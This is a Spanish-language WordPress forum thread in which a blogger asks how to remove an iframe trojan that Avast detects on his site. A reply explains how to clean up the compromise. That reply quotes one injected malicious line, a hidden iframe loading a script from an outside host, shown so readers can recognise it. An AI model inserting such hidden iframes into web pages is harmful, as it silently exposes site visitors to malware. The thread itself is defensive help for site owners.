Troyano detectado por avast

Inicio Foros WordPress General WordPress.org Troyano detectado por avast

Etiquetado: 

Este debate contiene 2 respuestas, tiene 2 mensajes y lo actualizó  juanmamontero hace 8 años, 11 meses.

  • Autor
    Publicaciones
  • #15092

    juanmamontero
    Participante

    <p>en mi blog:<br />
    http://www.juanmamontero.com<br />
    avast me cierra la conexion pues detecta esto</p>
    <p>HTML:IFrame-KP [Trj]</p>
    <p>como lo elimino = Gracias
    </p>

  • #34310

    fum
    Participante

    Hola, tuve un problema grave y me parece puede ser lo que esté atacando tu blog:

    Entrá a los archivos index y fijate si encontrás unas líneas semejantes a esto:

    <iframe src=”http://c9u.at:8080/ts/in.cgi?pepsi147″ width=125 height=125 style=”visibility: hidden”></iframe>

    La url puede ser otra.
    Si encontrás eso tomátelo con paciencia y hacé lo siguiente:

    1. Lo mejor sería que desde otra máquina que sepas que está limpia de virus (ideal hacerlo desde una Mac o desde un sistema Linux) cambiá tus contraseñas de FTP, y de WP. Esto, porque probablemente te robaron las contraseñas y un robot entra con intervalos de tiempo a tu blog e inserta esas líneas de código malicioso, no solamente en los index sino también en otros archivos. El cambio de contraseñas es para que no puedan volver a acceder. Si no podés hacerlo desde otra máquina asegurate de limpiar la tuya de virus para que no te roben las contraseñas nuevas. (a mi me pasaba eso y la cosa parecía no tener fin) El antivirus que tenía no detectaba la infección lo solucioné con Avira.

    2. Instalá [url=http://ocaoimh.ie/exploit-scanner/]Exploit Scaner[/url] es un pluging que escanea todo WP e identifica todas las líneas de código que podrían ser maliciosas, pero ojo vos tenés que diferenciar las que corresponden a código auténtico de las insertadas por el virus … Para eso, abrí los archivos correspondientes de la instalación de WP, o del plugin del que se trate y fijate si esas líneas existen en el original. Si existen las dejás y si no las borrás. En algunos casos podés reemplazar los archivos infectados por los originales.

    Una vez que limpiaste todo y con las contraseñas cambiadas no deberías tener más problema …
    Dale una mirada a este [url=http://cucoalmeria.net/2009/01/evitar-ser-hackeado-pon-seguridad-en-wordpress/]blog[/url], vas a encontrar varias entradas que ayudan con esto.

    Tenés que hacerlo rápido, sino Google te identifica con un sitio que incluye código malicioso y te pone un estupendo cartel que dice “Sitio peligroso” y recomienda no entrar a tu blog. Si llega a ocurrirte esto, igual se soluciona.
    No deseperes pero ocupate del asunto.

    Suerte y saludos.

  • #34324

    juanmamontero
    Participante

    encontre el codigo mirando el codigo fuente… pero no se donde lo metieron…

    intentare hacer lo que me dices… muchas gracias…

El foro ‘General WordPress.org’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest